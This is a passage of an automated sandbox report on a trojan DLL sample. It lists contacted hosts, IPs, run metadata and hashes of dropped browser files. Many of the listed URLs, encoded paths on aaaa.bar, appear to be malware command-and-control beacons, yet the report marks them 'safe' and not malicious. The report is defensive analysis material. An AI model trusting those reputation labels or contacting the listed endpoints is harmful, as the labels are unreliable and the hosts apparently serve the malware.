                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aaaa.bar/jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crwtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aaaa.bar/jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crwtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aaaa.bar/jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crwtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://btloader.com/tag?o=6208086025961472&upapi=truefalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crwtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aaaa.bar/jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crwtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://aaaa.bar/loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.750727112.0000000003333000.00000004.00000001.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuloaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggFloaddll32.exe, 00000000.00000002.800982427.000000000123F000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.26.3.70
                                                              		ad-delivery.netUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              31.220.111.98
                                                              		aaaa.barLithuania
                                                              		47583AS-HOSTINGERLTfalse
                                                              151.101.1.44
                                                              		tls13.taboola.map.fastly.netUnited States
                                                              		54113FASTLYUSfalse
                                                              104.26.7.139
                                                              		btloader.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              104.20.184.68
                                                              		geolocation.onetrust.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              172.217.168.38
                                                              		dart.l.doubleclick.netUnited States
                                                              		15169GOOGLEUSfalse

                                                              Private

                                                              IP
                                                              192.168.2.1

                                                              General Information

                                                              Joe Sandbox Version:33.0.0 White Diamond
                                                              Analysis ID:506330
                                                              Start date:20.10.2021
                                                              Start time:15:07:24
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 18m 13s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Sample file name:gECym.bin (renamed file extension from bin to dll)
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:49
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winDLL@26/19@24/7
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 64.6% (good quality ratio 60.8%)
                                                              • Quality average: 78.4%
                                                              • Quality standard deviation: 30.2%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Override analysis time to 240s for rundll32
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.80.193, 131.253.33.203, 80.67.82.240, 80.67.82.209, 131.253.33.200, 13.107.22.200, 65.55.44.109, 23.211.4.86, 23.211.6.95, 204.79.197.203, 152.199.19.161, 20.82.210.154, 80.67.82.211, 80.67.82.235, 40.112.88.60, 20.82.209.183, 20.54.110.249, 40.91.112.76, 51.104.136.2
                                                              • Excluded domains from analysis (whitelisted): signin.microsoft.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e11290.dspg.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, vote.microsoft.com, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, settingsfd-geo.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, cs9.wpc.v0cdn.net, store-images.s-microsoft.com-c.edgekey.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, www-msn-com.a-0003.a-msedge.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                              • Report creation exceeded maximum time and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              15:10:37API Interceptor1x Sleep call for process: regsvr32.exe modified
                                                              15:10:37API Interceptor2x Sleep call for process: rundll32.exe modified
                                                              15:10:37API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                              15:12:26API Interceptor46x Sleep call for process: powershell.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASN

                                                              No context

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3F2CDD13-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):5632
                                                              Entropy (8bit):2.303215435374284
                                                              Encrypted:false
                                                              SSDEEP:24:rBG//dyyoG//dyywjwyyaMJOyyqMJn9lW6rb9lW6r:rBG/8PG/8Nj7ncXV2i2
                                                              MD5:B56ACB4E6B3293BA19D0503E2170C408
                                                              SHA1:92DB88CC10DB2A603E8466D7B402C37D21A584C3
                                                              SHA-256:2449C11333E65E0D972FB3F5BC3A0667C6E8EEF0350663A1968C0B1ED02E679B
                                                              SHA-512:15CD996A299EA60B92DC0A5F5F9AC2924D8D61DD9173C2A821804C8C770268426228BD2455F17E9FEB051C7CC79EDD792F3421FB224E3AF0C3995A5F37B2EBBA
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................'...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.F.N.0.s.P.#.I.x.7.B.G.Q.5.e.z.0.u.1.c.N.y.Q.=.=.........:.......................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{3F2CDD15-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):332800
                                                              Entropy (8bit):3.5961335597614354
                                                              Encrypted:false
                                                              SSDEEP:3072:3Z/2Bfcdmu5kgTzGtMZ/2Bfc+mu5kgTzGtYZ/2Bfcdmu5kgTzGtPZ/2Bfc+mu5kn:+3CA
                                                              MD5:E18515874802ADABB53A5FDA9129AA3B
                                                              SHA1:B5E4471C3B7585C26EB07ED9D1708F2D11419C26
                                                              SHA-256:C5C901014D0AD31761C34F248BCA359042DC32A56F18934B1681A8A5F08D3325
                                                              SHA-512:1B16A003EC2FABA88B9E0383B4B1F43586DB475A1CA88E0EC2F84ECE719A7A5779F75696C3416794FB2D8CB8302BD4EC62ED28EB8B3E437C03002C517F1472F3
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>...........................................................G...H...I...J...............................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................0..6..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8....................................................... .......T.r.a.v.e.l.L.o.g...............................................................................................................T.L.0...................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{497FFA3A-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):4096
                                                              Entropy (8bit):1.6705445729981827
                                                              Encrypted:false
                                                              SSDEEP:12:rl0oXGFxT4XDrEgm8Gr76Fr+lXDrEgm8GD7qw9lpQA9dv9lsQ0Y9cC:rtG8r+lTG8C9laAH9lr0Y2
                                                              MD5:B22965349F002388D86C795AFD60EB6A
                                                              SHA1:68AA871597398E51A33ABF8C402C8D54C484AFCB
                                                              SHA-256:EBFFCD86C7D5468E4021389A5A72B51178AE653892BDFF78B2799D4205612DE7
                                                              SHA-512:C62ADFADA8DA38E0DB68AE58E5401FCEFB001B14CF098AA3AF04B56CBCEC8B43E4E5A7324FDB14BA5854DA72B8723856B8BFF0B2DE64C555363E4279B69FCF7F
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................psr3..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{800CAE1D-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):4096
                                                              Entropy (8bit):1.6657795438851608
                                                              Encrypted:false
                                                              SSDEEP:12:rl0oXGFvXDrEgm8Gr76FA+lXDrEgm8GD7qw9lpQA9dv9lsQ0Y9cC:rYG8A+lTG8C9laAH9lr0Y2
                                                              MD5:7B33FEEE0D101255C74A14617B867714
                                                              SHA1:EC8CF0E9F78A22A2D07A567D947A842C22B593E0
                                                              SHA-256:DCC08AA984FBC0153588DA4FC94DA31B710DCAFD83745FBD42B920CC30F46110
                                                              SHA-512:FD8CC23EBDF673D3478AD7AA71A85586EF7E413846A715BF96EEEC762D68C7410EB358818711C83B76D1DF8863A46640EAF4ABC1CA67845B725CE1A99EF7404A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................~..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D1D55D3D-31F2-11EC-90E5-ECF4BB570DC9}.dat
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):3584
                                                              Entropy (8bit):1.5617078821522077
                                                              Encrypted:false
                                                              SSDEEP:12:rlxAF6cDrEgm8GD7KFsr+lXDrEgm8GD7qw9lpQA9dI:ryG80r+lTG8C9laAg
                                                              MD5:7D83E65B1A457E107649B777321DD535
                                                              SHA1:0910FEDDE1889D1FB167F3877BFEDB2C89B371FF
                                                              SHA-256:76E6CFBA96B530161AA5C22CC0BA98AE299A3E3AAEDDD693DF71F6671BA757BD
                                                              SHA-512:696D0340BFBA24A714949F68382605708EC1C32B893E2768C942FE29154059D39033FD7D83EF3AE9A4E9AF4371E13AC23E0948EC9262828D6F5C6DDA1D7B0C89
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................5...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):356
                                                              Entropy (8bit):5.09283390816657
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc41EH8tPCTD90/QL3WIZK0QhPPFVDHkEtMjwu:TMHdNMNxOEHCPCnWimI00ONVbkEtMb
                                                              MD5:62E15860B582D37CA3DC1E8D89A26808
                                                              SHA1:A3CA8F879F027A187BAED3808170D6DC9BB869AB
                                                              SHA-256:88E4A132068204BC44F931CCA5AD81C3A1C24D9EAB5C1A76FE491C8FC15462F3
                                                              SHA-512:AC7BCEF376AE0F612E9B9EE6AA7FF7BD3C72B18E404160E531B73DB25AE7C52427BCC45DC4CE285ACDDCDD03CA9F0F9A714B0A13A44DE5884FD9B2F82E7D1B17
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2c5acf47,0x01d7c5ff</date><accdate>0x2de0356b,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):354
                                                              Entropy (8bit):5.154761999497282
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTkCQm5xupnPCTD90/QL3WIZK0QhPPFkI5kU5EtMjwu:TMHdNMNxe2kY5xu1PCnWimI00ONkak6t
                                                              MD5:0B75967CE7823399CC9E68BFB39555AB
                                                              SHA1:091F7FD13C40120E60A7DB5EF077C57FE360A7A4
                                                              SHA-256:E063C3FB1FAC640CC3A5D45DC8B1C4118D9E49F038353D08E3007895D01B2C66
                                                              SHA-512:90AA3E8082FCED94D90E5EF2EC85FA5A1A7D34BE809FCEEA0BC537C57B8A7007D37783E910A6A06B02D30CF7C099EBD0A89D7A29CBF2A008AC60D05A96A916D0
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x282eb4dc,0x01d7c5ff</date><accdate>0x29494c51,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):360
                                                              Entropy (8bit):5.115695135561688
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4GLxHcO7IG+X3PCTD90/QL3WIZK0QhPPFyhBcEEtMjwu:TMHdNMNxvLf7IG+nPCnWimI00ONmZEty
                                                              MD5:995D36FBF50B147C5BBB8631E1818BCB
                                                              SHA1:A717E139D22DADFDF5E3001311548D2B8162736B
                                                              SHA-256:1037C0DB52D760F85E31788A79938F98C02DAAA503EB1EF17428780DA5CF7A53
                                                              SHA-512:BCF4CF4E390276F2D2028515C9AC177F5DC06B1116676F21431CA96F442615E211EB3C8BC36A86F271F937F25B90911AD29088EEFBEC6212C61FE80D0E00A2EF
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x2dfeb9f7,0x01d7c5ff</date><accdate>0x2e974fc7,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):350
                                                              Entropy (8bit):5.103042002751772
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4Jfh8xPCTD90/QL3WIZK0QhPPFgE5EtMjwu:TMHdNMNxi58xPCnWimI00ONd5EtMb
                                                              MD5:1D0E1196E21C30784542EA183D95A74A
                                                              SHA1:CE8404D40C89CAA6AADC3CBF0ABB29A289D1E1FE
                                                              SHA-256:38D4C1B1A09D82ACE7C8FA471101DCB9DD56C6F7DB175C3EFC8505312D651F66
                                                              SHA-512:C369214C76B5F5BD6D0A6C3215924D1104D47D9FAE590C5BE6DB97AE208CEADED5C7F458C749C7E3E7DEC50957F85E737B608C2FD6C9E80182AFF042B0DEE41E
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x29f123e3,0x01d7c5ff</date><accdate>0x2a0fa821,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):356
                                                              Entropy (8bit):5.129962863682922
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGwjkl3GPCTD90/QL3WIZK0QhPPF8K0QU5EtMjwu:TMHdNMNxhGwQl3GPCnWimI00ON8K075t
                                                              MD5:9EE7BB9F737A35DFED726C4336113B67
                                                              SHA1:AD66D3D924114AF6CCFBA356BE34F2F31363B218
                                                              SHA-256:E9840BF4F1450FC2AF52F31F730021228A7CB245A9618D2869C5C8AC3A9265D3
                                                              SHA-512:E140396C5BBDD8C96C0826DA5A79BD7E76118612485005F11ABBFEA4531159802B10B7D98A37AB166C629B2BD3DE30DF0A2F76C99D003AD12814C6C62A12F02F
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2f7c3137,0x01d7c5ff</date><accdate>0x2fa2086b,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):354
                                                              Entropy (8bit):5.097430067460448
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4Qun2Bpm+PCTD90/QL3WIZK0QhPPFAkEtMjwu:TMHdNMNx0nUpm+PCnWimI00ONxEtMb
                                                              MD5:A20F5AC3338194FC43A94D368F1C9BC4
                                                              SHA1:AB3F7F046C8BD7B4C9D859B489E1125AC0A1BF8E
                                                              SHA-256:E6ADD4201A8FA3A044175A4FBBCA41E37D77B534B4E6673B2E0750DC55A27567
                                                              SHA-512:CF7D7AA80F1E1BC5593AF427094F393F96EB82086EFE6D79437CFF5A319128789FB371C14E36A76062FCBC6E74A0E0611180B6B24015AC9408E1DFE4E7953331
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x2bff4231,0x01d7c5ff</date><accdate>0x2c3c4bad,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):356
                                                              Entropy (8bit):5.157487660473765
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4oTZE+dSVX3PCTD90/QL3WIZK0QhPPF6Kq5EtMjwu:TMHdNMNxxZE+ol3PCnWimI00ON6Kq5Es
                                                              MD5:9CC05798E2875E33DA3EDF0EC27114E7
                                                              SHA1:FCA636B9EE2F1ED2BE5CC432D7858B2A1F39448C
                                                              SHA-256:E49C4CC7CB305E47A167A3CF2903AC6ACFE07BB3B4A768C6E5CE7456382FB759
                                                              SHA-512:097E6FD828903745B87C0CABEF36F5B68416CD17AA5BE9A777BCACC3A8AA6951BCC234E42B3D6290FF87AFCB6C8A38A6DC73AD181DE0C479BAD4BFCFD151C6AE
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x2aa83e96,0x01d7c5ff</date><accdate>0x2bca2890,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):358
                                                              Entropy (8bit):5.13236679854782
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2nWisFVUB+PCTD90/QL3WIZK0QhPPF02CqEtMjwu:TMHdNMNxcWiC++PCnWimI00ONVEtMb
                                                              MD5:10F611B03BE4A108C81266AFDCD91385
                                                              SHA1:12FBE36DE82221E790A9A5D466BB2662571FF974
                                                              SHA-256:D0BCC8F1B999D1ECCD3ADBE429D4CE109D233FF0A713690067BC285BAC7ACAA1
                                                              SHA-512:0F05E1D796C0EC220F3A159ADAA979E5F7DC8CCA6751D115595DF405D50F9A8F037D9B309523C9FA1FC6BC2B72FC7C898E10918610FAD70B8A6FC1726EFAA5ED
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2977127a,0x01d7c5ff</date><accdate>0x298da916,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):354
                                                              Entropy (8bit):5.133907694283372
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4Inb17y3+GcPCTD90/QL3WIZK0QhPPFiwE5EtMjwu:TMHdNMNxfnZ23+5PCnWimI00ONe5EtMb
                                                              MD5:7C6EB178DBB04EBFC7E6B9C793025BC0
                                                              SHA1:326D228502753815F74904D961CF0C9734D9201A
